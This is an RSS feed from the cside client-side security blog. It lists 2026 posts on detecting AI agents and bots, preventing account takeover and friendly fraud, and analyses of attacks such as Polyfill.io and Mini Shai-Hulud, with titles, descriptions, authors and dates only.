<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"><channel><title>cside Blog</title><description>Research and blogs about Client Side Security.</description><link>https://cside.com/</link><language>en</language><webMaster>hello@cside.com</webMaster><ttl>60</ttl><image><url>https://cside.com/android-chrome-192x192.png</url><title>cside Blog</title><link>https://cside.com/blog</link></image><item><title>How to Block ClaudeBot on Your Website</title><link>https://cside.com/blog/how-to-block-claudebot</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-claudebot</guid><description>ClaudeBot crawls your site to train Anthropic&apos;s Claude models. Here is how to block it with robots.txt and IP ranges, and what the block still misses.</description><pubDate>Tue, 16 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author></item><item><title>How to Prevent Fake Account Creation: Why Browser-Layer Detection Catches What Email Verification Misses</title><link>https://cside.com/blog/how-to-prevent-fake-account-creation</link><guid isPermaLink="true">https://cside.com/blog/how-to-prevent-fake-account-creation</guid><description>Email verification confirms a mailbox exists. It cannot see the browser. Here is why browser-layer detection catches fake account creation it misses.</description><pubDate>Mon, 15 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Prevent+Fake+Account+Creation%3A+Why+Browser-Layer+Detection+Catches+What+Email+Verification+Misses&amp;point=New+account+fraud+jumped+31%25+in+2025&amp;point=Email+and+OTP+verify+the+endpoint%2C+not+the+registrant&amp;point=Browser-layer+detection+fires+before+verification" length="0" type="image/webp"/></item><item><title>Polyfill.io Supply Chain Attack: Complete Timeline, Analysis &amp; Lessons (2024–2026)</title><link>https://cside.com/blog/polyfill-io-supply-chain-attack-timeline</link><guid isPermaLink="true">https://cside.com/blog/polyfill-io-supply-chain-attack-timeline</guid><description>A complete, sourced timeline of the Polyfill.io supply chain attack, from the 2024 domain sale to the 2025 Funnull sanctions, and how to remove it today.</description><pubDate>Sun, 14 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Polyfill.io+Supply+Chain+Attack%3A+Complete+Timeline%2C+Analysis+%26+Lessons+%282024%E2%80%932026%29&amp;bannerTitle=Polyfill.io+Supply+Chain+Attack&amp;point=490%2C000%2B+sites+hit%2C+not+the+100k+you+saw&amp;point=Full+timeline%3A+2024+attack+to+2025+sanctions&amp;point=How+to+find+and+remove+it+today" length="0" type="image/webp"/></item><item><title>How to Block AI Card-Testing Agents</title><link>https://cside.com/blog/how-to-block-ai-card-testing-agents</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-card-testing-agents</guid><description>AI card-testing agents probe payment flows using real browsers. Learn the browser signals that expose them before a transaction completes.</description><pubDate>Sat, 13 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/06/How-to-Block-AI-Card-Testing-Agents---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Choose an AI Agent Detection Solution</title><link>https://cside.com/blog/how-to-choose-ai-agent-detection-solution</link><guid isPermaLink="true">https://cside.com/blog/how-to-choose-ai-agent-detection-solution</guid><description>A five-step buying guide for CISOs evaluating AI agent detection solutions: architecture, classification, vendor profiles, and POC methodology.</description><pubDate>Fri, 12 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/how-to-choose-agent-image.webp" length="0" type="image/webp"/></item><item><title>Best Bot and Agent Trust Management Platforms Compared (2026)</title><link>https://cside.com/blog/best-bot-and-agent-trust-management-platforms-compared</link><guid isPermaLink="true">https://cside.com/blog/best-bot-and-agent-trust-management-platforms-compared</guid><description>Forrester defines the category. cside, DataDome, HUMAN Security, Kasada, and Arkose Labs compared on detection layer, intent, and agentic coverage.</description><pubDate>Thu, 11 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/06/Best-Bot-and-Agent-Trust-Management-Platforms-Compared---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Block OpenAI Operator on Your Website</title><link>https://cside.com/blog/how-to-block-openai-operator</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-openai-operator</guid><description>OpenAI Operator browses your site like a real user. Learn how to detect and block it using browser-layer signals and when you should not block it.</description><pubDate>Wed, 10 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/block-openai-operator-cover.webp" length="0" type="image/webp"/></item><item><title>DBSC vs Device Fingerprinting: What Chrome&apos;s Session Security Does Not Cover</title><link>https://cside.com/blog/dbsc-vs-device-fingerprinting</link><guid isPermaLink="true">https://cside.com/blog/dbsc-vs-device-fingerprinting</guid><description>Chrome&apos;s DBSC stops stolen-cookie replay, but it is Chrome-only, post-login, and not a device-identity layer. Here is the fraud it leaves open.</description><pubDate>Tue, 09 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=DBSC+vs+Device+Fingerprinting%3A+What+Chrome%27s+Session+Security+Does+Not+Cover&amp;bannerTitle=DBSC+vs+device+fingerprinting&amp;point=DBSC+is+Chrome-only+and+post-login&amp;point=It+binds+the+attacker%27s+device+too&amp;point=Fingerprinting+covers+what+DBSC+cannot" length="0" type="image/webp"/></item><item><title>How to Block Perplexity Shopper on Your Website</title><link>https://cside.com/blog/how-to-block-perplexity-shopper</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-perplexity-shopper</guid><description>Perplexity Shopper browses and buys from retail websites on behalf of Pro users. Learn how to detect its browser-layer signals and govern the traffic.</description><pubDate>Tue, 09 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/block-perplexity-shopper-cover.webp" length="0" type="image/webp"/></item><item><title>When an AI API returns another user&apos;s response: shared caches and cross-tenant leaks</title><link>https://cside.com/blog/ai-api-shared-cache-data-leaks</link><guid isPermaLink="true">https://cside.com/blog/ai-api-shared-cache-data-leaks</guid><description>A Claude API incident appears to have returned other users&apos; responses. Why shared caches cause cross-tenant leaks, and how to build around the risk.</description><pubDate>Fri, 05 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>News</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/ai-api-shared-cache-data-leaks-cover.webp" length="0" type="image/webp"/></item><item><title>MFA Didn&apos;t Fail, the Trust Model Did: Device Code Phishing and OAuth Token Theft (Kali365)</title><link>https://cside.com/blog/mfa-token-theft-device-code-phishing-trust-model</link><guid isPermaLink="true">https://cside.com/blog/mfa-token-theft-device-code-phishing-trust-model</guid><description>Kali365 abuses the OAuth 2.0 device authorization grant to steal Microsoft 365 tokens after MFA. A technical breakdown of the flow, FOCI, and detection.</description><pubDate>Fri, 05 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/mfa-token-theft-device-code-phishing-trust-model.webp" length="0" type="image/webp"/></item><item><title>AI is compressing the exploit cycle: Google&apos;s AI-developed zero-day and what it means for browsers</title><link>https://cside.com/blog/ai-exploit-cycle-compression-browser-zero-days</link><guid isPermaLink="true">https://cside.com/blog/ai-exploit-cycle-compression-browser-zero-days</guid><description>Google flagged a zero-day it believes was AI-developed. The real AI security shift isn&apos;t smarter phishing, it&apos;s how fast exploits reach the browser.</description><pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/ai-exploit-cycle-compression-browser-zero-days-cover.webp" length="0" type="image/webp"/></item><item><title>The Browser Session Is Now a Security Control Plane. Attackers Knew That Years Ago.</title><link>https://cside.com/blog/browser-session-security-control-plane-dbsc</link><guid isPermaLink="true">https://cside.com/blog/browser-session-security-control-plane-dbsc</guid><description>Google&apos;s DBSC proposal validates a clear security shift: browser sessions need device-aware validation after login, not only MFA.</description><pubDate>Sat, 30 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/browser-session-security-control-plane-dbsc.webp" length="0" type="image/webp"/></item><item><title>Comparing Solutions for Account Takeover Prevention | 2026</title><link>https://cside.com/blog/top-account-takeover-prevention-solutions-selection-guide</link><guid isPermaLink="true">https://cside.com/blog/top-account-takeover-prevention-solutions-selection-guide</guid><description>Anti-fraud suites, fingerprinting tools, and MFA compared by what they cover in the ATO attack chain. Find the right stack for your risk profile.</description><pubDate>Wed, 27 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Comparing+Solutions+for+Account+Takeover+Prevention+%7C+2026&amp;bannerTitle=Comparing+ATO+Prevention+Solutions&amp;point=Anti-fraud+suites+vs+fingerprinting&amp;point=Why+MFA+is+not+enough+to+stop+ATO&amp;point=Selection+tips+by+risk+profile" length="0" type="image/webp"/></item><item><title>How to Stop AI Agents From Creating Fake Accounts (Guide)</title><link>https://cside.com/blog/how-to-stop-ai-agents-from-creating-fake-accounts-guide</link><guid isPermaLink="true">https://cside.com/blog/how-to-stop-ai-agents-from-creating-fake-accounts-guide</guid><description>AI agents create fake accounts using real browsers, residential IPs, and generated identities. Here&apos;s the detection signal stack to stop them.</description><pubDate>Wed, 20 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Stop+AI+Agents+From+Creating+Fake+Accounts+%28Guide%29&amp;bannerTitle=Stop+AI+Fake+Account+Creation&amp;point=Identity%2C+network%2C+browser%2C+and+behavioral+signals&amp;point=Why+CAPTCHA+fails+against+AI+agents&amp;point=Enforcement+strategies+that+work" length="0" type="image/webp"/></item><item><title>How to Block AI-Agent Based Content Scraping Bots (Guide)</title><link>https://cside.com/blog/guide-to-blocking-ai-agent-content-scraping-bots</link><guid isPermaLink="true">https://cside.com/blog/guide-to-blocking-ai-agent-content-scraping-bots</guid><description>AI content scraping bots use real browsers, residential IPs, and LLM-powered extraction to harvest your pricing and content. Here&apos;s how to stop them.</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/images/ai-content-scraper-blocking-detection-strategies-5760x3240.webp" length="0" type="image/webp"/></item><item><title>The Snowball Effect: How Mini Shai-Hulud Turns npm into a Worm Distribution Network</title><link>https://cside.com/blog/mini-shai-hulud-npm-worm-snowball-effect</link><guid isPermaLink="true">https://cside.com/blog/mini-shai-hulud-npm-worm-snowball-effect</guid><description>Mini Shai-Hulud turned npm packages into a credential-theft loop. Here is how the AntV wave spread and what teams should monitor next.</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/mini-shai-hulud-npm-worm-banner.webp" length="0" type="image/webp"/></item><item><title>Why CAPTCHAs Are No Longer Reliable Bot Defense</title><link>https://cside.com/blog/why-captchas-are-dead</link><guid isPermaLink="true">https://cside.com/blog/why-captchas-are-dead</guid><description>CAPTCHAs are no longer a reliable primary bot defense. Learn why visible challenges fail and how resource-wasting defenses raise attacker cost.</description><pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/why-captchas-are-dead-cside.webp" length="0" type="image/webp"/></item><item><title>Funnull Sanctioned: What the Polyfill[.]io Attack Exposed About Infrastructure Laundering</title><link>https://cside.com/blog/funnull-sanctioned-polyfill-infrastructure-laundering</link><guid isPermaLink="true">https://cside.com/blog/funnull-sanctioned-polyfill-infrastructure-laundering</guid><description>OFAC&apos;s Funnull sanctions show why the Polyfill attack was part of a larger infrastructure laundering and browser supply-chain risk.</description><pubDate>Mon, 18 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/funnull-sanctioned-polyfill-infrastructure-laundering-banner.webp" length="0" type="image/webp"/></item><item><title>On-Device Inference Is Coming for Your Security Stack: For Better and Worse</title><link>https://cside.com/blog/on-device-inference-security-stack</link><guid isPermaLink="true">https://cside.com/blog/on-device-inference-security-stack</guid><description>On-device AI can protect sensitive data and power endpoint defense, but it also creates new prompt injection, telemetry, and browser attack paths.</description><pubDate>Mon, 18 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/on-device-inference-security-stack-banner.webp" length="0" type="image/webp"/></item><item><title>4 Tools To Detect AI Agents On Your Website (Fraud Prevention)</title><link>https://cside.com/blog/best-tools-for-ai-agent-detection-to-prevent-website-fraud</link><guid isPermaLink="true">https://cside.com/blog/best-tools-for-ai-agent-detection-to-prevent-website-fraud</guid><description>Compare cside, HUMAN Security, DataDome, and Cloudflare for AI agent detection. See how each tool handles fraud prevention, pricing, and implementation.</description><pubDate>Fri, 15 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/images/comparing-tools-to-detect-ai-agents-on-your-website-cside.webp" length="0" type="image/webp"/></item><item><title>AI-Agent Based Credit Card Testing Bots | How to Stop Them</title><link>https://cside.com/blog/how-to-block-ai-credit-card-testing-agents</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-credit-card-testing-agents</guid><description>AI credit card testing agents use real browsers to test stolen credentials at scale. Learn how to detect and block them before a transaction completes.</description><pubDate>Fri, 15 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/block-ai-agent-credit-card-testing-bots-cside.png" length="0" type="image/png"/></item><item><title>What Are Stealth (or &apos;Anti-Detect&apos;) Browsers and When to Block Them</title><link>https://cside.com/blog/stealth-browsers-and-anti-detect-browsers-explained</link><guid isPermaLink="true">https://cside.com/blog/stealth-browsers-and-anti-detect-browsers-explained</guid><description>Stealth browsers bypass bot detection. Anti-detect browsers spoof fingerprints. Learn the signals that reveal both, even when they look human.</description><pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/stealth-browsers-and-anti-detect-browsers-explained-feature.webp" length="0" type="image/webp"/></item><item><title>cside Named SourceForge Spring 2026 Top Performer for Client-Side Security</title><link>https://cside.com/blog/cside-sourceforge-spring-2026-top-performer</link><guid isPermaLink="true">https://cside.com/blog/cside-sourceforge-spring-2026-top-performer</guid><description>cside was named a SourceForge Spring 2026 Top Performer, reflecting user trust in client-side security, PCI evidence, and support.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/cside-sourceforge-banner.webp" length="0" type="image/webp"/></item><item><title>How to Detect AI Agents on Your Website | Full Guide</title><link>https://cside.com/blog/guide-to-detect-ai-agent-traffic-on-your-website</link><guid isPermaLink="true">https://cside.com/blog/guide-to-detect-ai-agent-traffic-on-your-website</guid><description>This guide covers AI agent detection through identity, network, browser, and behavioral signals. See free methods like server log analysis and specialized tools.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/images/how-to-detect-ai-agents-on-your-website-cover.webp" length="0" type="image/webp"/></item><item><title>cside Co-Chairs W3C Anti-Fraud Browser Security</title><link>https://cside.com/blog/cside-w3c-anti-fraud-community-group-browser-security</link><guid isPermaLink="true">https://cside.com/blog/cside-w3c-anti-fraud-community-group-browser-security</guid><description>Simon Wijckmans now co-chairs W3C AFCG as cside helps shape privacy-preserving browser signals for AI-era fraud.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/w3c-anti-fraud-community-group-browser-security-og.webp" length="0" type="image/webp"/></item><item><title>What Is Mastercard First-Party Trust? How It Reduces Chargebacks</title><link>https://cside.com/blog/mastercard-fpt-how-it-reduces-chargebacks</link><guid isPermaLink="true">https://cside.com/blog/mastercard-fpt-how-it-reduces-chargebacks</guid><description>Mastercard First-Party Trust deflects friendly fraud disputes before they become formal chargebacks. Here is how the evidence framework works.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mastercard-fpt-cover-1.5x.webp" length="0" type="image/webp"/></item><item><title>Mastercard First Party Trust: Improve EFM and ECP Ratios with Device Fingerprinting</title><link>https://cside.com/blog/mastercard-fpt-device-fingerprinting-to-improve-efm-and-ecp</link><guid isPermaLink="true">https://cside.com/blog/mastercard-fpt-device-fingerprinting-to-improve-efm-and-ecp</guid><description>Mastercard&apos;s First Party Trust program uses device fingerprinting to deflect friendly fraud disputes before they inflate your EFM and ECP ratios.</description><pubDate>Fri, 08 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mastercard-fpt-cover-1920x1080.webp" length="0" type="image/webp"/></item><item><title>Comparing Tools for PCI DSS 6.4.3 &amp; 11.6.1 | Features, Pricing</title><link>https://cside.com/blog/solution-comparison-pci-dss-6-4-3-and-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/solution-comparison-pci-dss-6-4-3-and-11-6-1</guid><description>Compare PCI DSS 6.4.3 and 11.6.1 compliance tools. Features, pricing, and reviews for cside, Feroot, Cloudflare, and Reflectiz side by side.</description><pubDate>Thu, 07 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/images/comparing-solutions-pci-dss-6-4-3-11-6-1-cside.webp" length="0" type="image/webp"/></item><item><title>Friendly Fraud in Travel and Hospitality: The 2026 Playbook</title><link>https://cside.com/blog/friendly-fraud-travel-hospitality-playbook</link><guid isPermaLink="true">https://cside.com/blog/friendly-fraud-travel-hospitality-playbook</guid><description>Travel and hospitality merchants face the highest-value friendly fraud disputes. How CE 3.0 and browser-layer evidence rebalance the win rate.</description><pubDate>Wed, 06 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/friendly-fraud-travel-hospitality-playbook-og.webp" length="0" type="image/webp"/></item><item><title>Mastercard Scam Merchant Monitoring 2026: What Merchants Must Know Before July</title><link>https://cside.com/blog/mastercard-scam-merchant-monitoring-2026</link><guid isPermaLink="true">https://cside.com/blog/mastercard-scam-merchant-monitoring-2026</guid><description>Mastercard Scam Merchant Monitoring takes full effect on 24 July 2026. Here are the SMMP triggers, how it differs from ECM and EFM, and how merchants can prepare.</description><pubDate>Tue, 05 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/mastercard-scam-merchant-monitoring-2026-og.webp" length="0" type="image/webp"/></item><item><title>Utah SB 73: You Are Now Liable for Users&apos; VPNs</title><link>https://cside.com/blog/utah-sb73-vpn-age-verification-compliance</link><guid isPermaLink="true">https://cside.com/blog/utah-sb73-vpn-age-verification-compliance</guid><description>Utah SB 73 holds operators liable when users bypass age gates with VPNs. An IP blocklist cannot keep pace. Behavioural detection is what works.</description><pubDate>Tue, 05 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/utah-sb73-vpn-detection-age-verification-blog-cover-cside.webp" length="0" type="image/webp"/></item><item><title>CE 3.0 Auto-Qualification: What Changed on 17 October 2025 and What To Do Now</title><link>https://cside.com/blog/ce-3-auto-qualification-visa-secure</link><guid isPermaLink="true">https://cside.com/blog/ce-3-auto-qualification-visa-secure</guid><description>Visa auto-qualifies transactions for Compelling Evidence 3.0 via Visa Secure and Visa Data Only. What changed, who benefits, and the evidence gap.</description><pubDate>Fri, 01 May 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/ce-3-auto-qualification-visa-secure-og.webp" length="0" type="image/webp"/></item><item><title>Friendly Fraud in Gaming and iGaming: The 2026 Chargeback Playbook</title><link>https://cside.com/blog/friendly-fraud-gaming-igaming-playbook</link><guid isPermaLink="true">https://cside.com/blog/friendly-fraud-gaming-igaming-playbook</guid><description>iGaming merchants run the highest chargeback ratios of any vertical. VAMP 2026 tightened the line. How CE 3.0 plus browser-layer evidence rebalances the book.</description><pubDate>Wed, 29 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/friendly-fraud-gaming-igaming-playbook-og.webp" length="0" type="image/webp"/></item><item><title>VAMP 2026: Visa&apos;s New Thresholds and How to Survive Them</title><link>https://cside.com/blog/vamp-2026-merchant-playbook</link><guid isPermaLink="true">https://cside.com/blog/vamp-2026-merchant-playbook</guid><description>Visa&apos;s VAMP ratio dropped to 1.5% on 1 April 2026 with $8-per-transaction fines. A merchant playbook for staying under the new thresholds using CE 3.0.</description><pubDate>Wed, 29 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/vamp-2026-merchant-playbook-og.webp" length="0" type="image/webp"/></item><item><title>Compelling Evidence 3.0 Requirements: What Visa Mandates and What Actually Wins the Case</title><link>https://cside.com/blog/compelling-evidence-3-requirements-data-points</link><guid isPermaLink="true">https://cside.com/blog/compelling-evidence-3-requirements-data-points</guid><description>The four data elements Visa requires for CE 3.0, and what separates winning representments from losing ones.</description><pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/compelling-evidence-3-requirements-data-points-og.webp" length="0" type="image/webp"/></item><item><title>How OpenClaw Agents Bypass Bot Detection (And How to Stop Them)</title><link>https://cside.com/blog/how-openclaw-agents-bypass-bot-detection</link><guid isPermaLink="true">https://cside.com/blog/how-openclaw-agents-bypass-bot-detection</guid><description>OpenClaw agents paired with stealth browser tooling can bypass legacy bot detection. Learn how agentic fraud works and how browser fingerprinting helps stop it.</description><pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/images/banner-openclaw.png" length="0" type="image/png"/></item><item><title>What CTEM at the browser layer actually looks like: one third-party script, five findings</title><link>https://cside.com/blog/ctem-browser-enforcement</link><guid isPermaLink="true">https://cside.com/blog/ctem-browser-enforcement</guid><description>A live analysis of one Skeepers widget on a major international bank surfaced a 360-day cookie on auth subdomains, a CSP gap, and a server-controlled sub-script. Here&apos;s what CTEM looks like applied to the browser layer.</description><pubDate>Mon, 27 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/ctem-browser-enforcement-og.png" length="0" type="image/png"/></item><item><title>Friendly Fraud in SaaS and Subscription Businesses: The 2026 Playbook</title><link>https://cside.com/blog/friendly-fraud-saas-subscription-playbook</link><guid isPermaLink="true">https://cside.com/blog/friendly-fraud-saas-subscription-playbook</guid><description>SaaS and subscription businesses have a specific friendly fraud profile: descriptor drift, recurring billing, and CE 3.0-eligible customers. Here is how to fight it.</description><pubDate>Mon, 27 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/friendly-fraud-saas-subscription-playbook-og.png" length="0" type="image/png"/></item><item><title>Comparing account sharing prevention tools (for businesses)</title><link>https://cside.com/blog/comparing-account-sharing-prevention-tools-for-businesses</link><guid isPermaLink="true">https://cside.com/blog/comparing-account-sharing-prevention-tools-for-businesses</guid><description>SaaS companies lose revenue to account sharing every day. See a comparison of features, pricing, and reviews of popular tools used by fraud teams.</description><pubDate>Thu, 23 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Comparing-Tools-That--Prevent-Account-Sharing---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to prevent account sharing fraud (full guide for businesses)</title><link>https://cside.com/blog/prevent-account-sharing-full-guide-for-businesses</link><guid isPermaLink="true">https://cside.com/blog/prevent-account-sharing-full-guide-for-businesses</guid><description>Account sharing costs organizations billions in revenue loss. This guide covers prevention methods like device and session limits, as well as strategic tips.</description><pubDate>Wed, 22 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Full-Guide_-How-to-Prevent-Account-Sharing-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Remove a TC40 from Your VAMP Ratio: The CE 3.0 Mechanic</title><link>https://cside.com/blog/how-to-remove-tc40-via-compelling-evidence-3</link><guid isPermaLink="true">https://cside.com/blog/how-to-remove-tc40-via-compelling-evidence-3</guid><description>TC40 fraud reports feed your VAMP ratio without a chargeback. A successful CE 3.0 representment is the only way to remove one. Here&apos;s how it works.</description><pubDate>Tue, 21 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/images/how-to-remove-tc40-via-compelling-evidence-3-og.webp" length="0" type="image/webp"/></item><item><title>7 steps to stop account takeover fraud  (for Travel businesses)</title><link>https://cside.com/blog/proven-tips-to-stop-account-takeover-fraud-travel-websites</link><guid isPermaLink="true">https://cside.com/blog/proven-tips-to-stop-account-takeover-fraud-travel-websites</guid><description>MFA is bypassed by advanced phishing kits. See the best practices, fingerprint signals, and tools that Travel fraud teams actually use to stop ATO.</description><pubDate>Sun, 19 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/7-Steps-for-Travel-Website-Teams-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>Quick guide to prevent Account Takeover fraud (crypto businesses)</title><link>https://cside.com/blog/quick-guide-to-prevent-account-takeover-fraud-crypto-websites</link><guid isPermaLink="true">https://cside.com/blog/quick-guide-to-prevent-account-takeover-fraud-crypto-websites</guid><description>Crypto accounts are the most valuable ATO target of any industry. See the best practices, fingerprint signals, and tools Crypto teams use to stop ATO.</description><pubDate>Fri, 17 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Best-Practices-for-Crypto-Teams-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How Advanced Location Data Prevents Account Takeover and Detects Unsafe AI-Agent Token Reuse</title><link>https://cside.com/blog/advanced-location-data-account-takeover-ai-agent-token-reuse</link><guid isPermaLink="true">https://cside.com/blog/advanced-location-data-account-takeover-ai-agent-token-reuse</guid><description>How advanced location data helps security teams detect impossible travel, stolen-session reuse, and unsafe AI-agent activity before account takeover turns into fraud or data loss.</description><pubDate>Wed, 15 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://files.manuscdn.com/user_upload_by_module/session_file/310519663253463647/BRXVwNletTJpbyiJ.png" length="0" type="image/png"/></item><item><title>How Compromised Third-Party Scripts Can Prompt-Inject AI Agents</title><link>https://cside.com/blog/how-compromised-third-party-scripts-can-prompt-inject-ai-agents</link><guid isPermaLink="true">https://cside.com/blog/how-compromised-third-party-scripts-can-prompt-inject-ai-agents</guid><description>Third-party scripts already adapt website behavior by browser characteristics. That same flexibility can be abused to detect AI agents and inject misleading instructions or altered content.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/cside_ai_agent_prompt_injection_banner_v1.webp" length="0" type="image/webp"/></item><item><title>Best methods to prevent account takeover fraud  (FinTech)</title><link>https://cside.com/blog/best-methods-to-prevent-account-takeover-fraud-fintech</link><guid isPermaLink="true">https://cside.com/blog/best-methods-to-prevent-account-takeover-fraud-fintech</guid><description>FinTech accounts are targeted daily by attackers. See the best practices, fingerprint signals, and prevention tools FinTech teams use to stop ATO.</description><pubDate>Fri, 10 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Best-Practices-for-FinTech-Teams-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>Best practices to prevent account takeover fraud  (eCommerce)</title><link>https://cside.com/blog/ecommerce-best-practices-to-prevent-account-takeover-fraud</link><guid isPermaLink="true">https://cside.com/blog/ecommerce-best-practices-to-prevent-account-takeover-fraud</guid><description>eCommerce accounts are targeted daily by attackers. See the best practices, fingerprint signals, and prevention tools eCom companies use to stop ATO.</description><pubDate>Wed, 08 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/04/Best-Practices-for-eCommerce-Merchants-to-Stop-ATO-Fraud---cside---blog-cover.webp" length="0" type="image/webp"/></item><item><title>How to Prevent Account Takeover Fraud | 4 Step Guide for Businesses</title><link>https://cside.com/blog/how-to-stop-account-takeover-fraud-guide-for-businesses</link><guid isPermaLink="true">https://cside.com/blog/how-to-stop-account-takeover-fraud-guide-for-businesses</guid><description>MFA helps, but it does not stop account takeover on its own. This guide covers how businesses can prevent ATO early with fingerprinting signals.</description><pubDate>Tue, 07 Apr 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure 